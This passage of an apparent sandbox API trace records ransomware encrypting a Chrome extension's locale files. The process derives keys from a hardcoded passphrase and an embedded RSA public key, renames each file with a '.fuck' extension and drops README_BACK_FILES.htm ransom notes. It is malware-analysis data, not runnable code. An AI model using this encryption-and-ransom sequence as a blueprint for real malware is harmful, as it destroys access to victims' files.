lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.395] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2938f48) returned 1 [0250.395] CryptImportPublicKeyInfo (in: hCryptProv=0x2938f48, dwCertEncodingType=0x1, pInfo=0x29340c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29340f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29340f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29857e0) returned 1 [0250.395] CryptEncrypt (in: hKey=0x29857e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.395] CryptEncrypt (in: hKey=0x29857e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2938fd0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2938fd0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.395] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2938fd0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2938fd0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.396] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x107, lpOverlapped=0x0) returned 1 [0250.398] CryptEncrypt (in: hKey=0x2985860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x107, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.398] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.398] CloseHandle (hObject=0x5d58) returned 1 [0250.398] CloseHandle (hObject=0x5d5c) returned 1 [0250.398] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), bFailIfExists=0) returned 1 [0250.402] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json", dwFileAttributes=0x0) returned 1 [0250.405] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.gsg")) returned 1 [0250.406] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.fuck")) returned 1 [0250.407] CryptDestroyHash (hHash=0x2985f20) returned 1 [0250.407] CryptDestroyKey (hKey=0x2985860) returned 1 [0250.408] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.408] FindNextFileA (in: hFindFile=0x2985e20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.408] FindClose (in: hFindFile=0x2985e20 | out: hFindFile=0x2985e20) returned 1 [0250.408] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\readme_back_files.htm")) returned 0xffffffff [0250.408] AreFileApisANSI () returned 1 [0250.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.408] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.409] GetFileType (hFile=0x5d54) returned 0x1 [0250.409] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.410] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.410] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ca0 [0250.410] FindNextFileA (in: hFindFile=0x2985ca0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.410] FindNextFileA (in: hFindFile=0x2985ca0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.410] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.410] GetLastError () returned 0x0 [0250.410] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json")) returned 0x20 [0250.411] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0250.411] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.412] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.413] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.413] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x28f6348) returned 1 [0250.416] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.416] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.416] CryptHashData (hHash=0x2985ba0, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.416] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985a20) returned 1 [0250.416] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.416] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.416] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x28f5b50) returned 1 [0250.416] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5b50, dwCertEncodingType=0x1, pInfo=0x2935030*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935060*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935068*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985ce0) returned 1 [0250.416] CryptEncrypt (in: hKey=0x2985ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.416] CryptEncrypt (in: hKey=0x2985ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5bd8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x28f5bd8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.417] WriteFile (in: hFile=0x5d58, lpBuffer=0x28f5bd8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x28f5bd8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.418] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x108, lpOverlapped=0x0) returned 1 [0250.419] CryptEncrypt (in: hKey=0x2985a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x108, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.419] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.419] CloseHandle (hObject=0x5d5c) returned 1 [0250.420] CloseHandle (hObject=0x5d58) returned 1 [0250.420] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0250.423] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0250.424] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.gsg")) returned 1 [0250.425] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.fuck")) returned 1 [0250.426] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0250.426] CryptDestroyKey (hKey=0x2985a20) returned 1 [0250.426] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0250.426] FindNextFileA (in: hFindFile=0x2985ca0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.426] FindClose (in: hFindFile=0x2985ca0 | out: hFindFile=0x2985ca0) returned 1 [0250.426] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff [0250.426] AreFileApisANSI () returned 1 [0250.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.426] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.427] GetFileType (hFile=0x5d54) returned 0x1 [0250.427] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.428] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.428] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985f20 [0250.429] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.429] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.429] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.429] GetLastError () returned 0x0 [0250.429] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json")) returned 0x20 [0250.430] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0250.430] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.431] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.431] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.432] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.434] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.434] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.435] CryptHashData (hHash=0x2985a60, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.435] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2985a60, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985860) returned 1 [0250.435] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.435] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.435] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293dbc8) returned 1 [0250.435] CryptImportPublicKeyInfo (in: hCryptProv=0x293dbc8, dwCertEncodingType=0x1, pInfo=0x2934330*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934360*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934368*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985c60) returned 1 [0250.435] CryptEncrypt (in: hKey=0x2985c60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.435] CryptEncrypt (in: hKey=0x2985c60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6348*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x28f6348*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.436] WriteFile (in: hFile=0x5d5c, lpBuffer=0x28f6348*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x28f6348*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.437] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x105, lpOverlapped=0x0) returned 1 [0250.439] CryptEncrypt (in: hKey=0x2985860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x105, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.439] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.439] CloseHandle (hObject=0x5d58) returned 1 [0250.439] CloseHandle (hObject=0x5d5c) returned 1 [0250.439] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0250.442] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0250.443] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.gsg")) returned 1 [0250.444] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 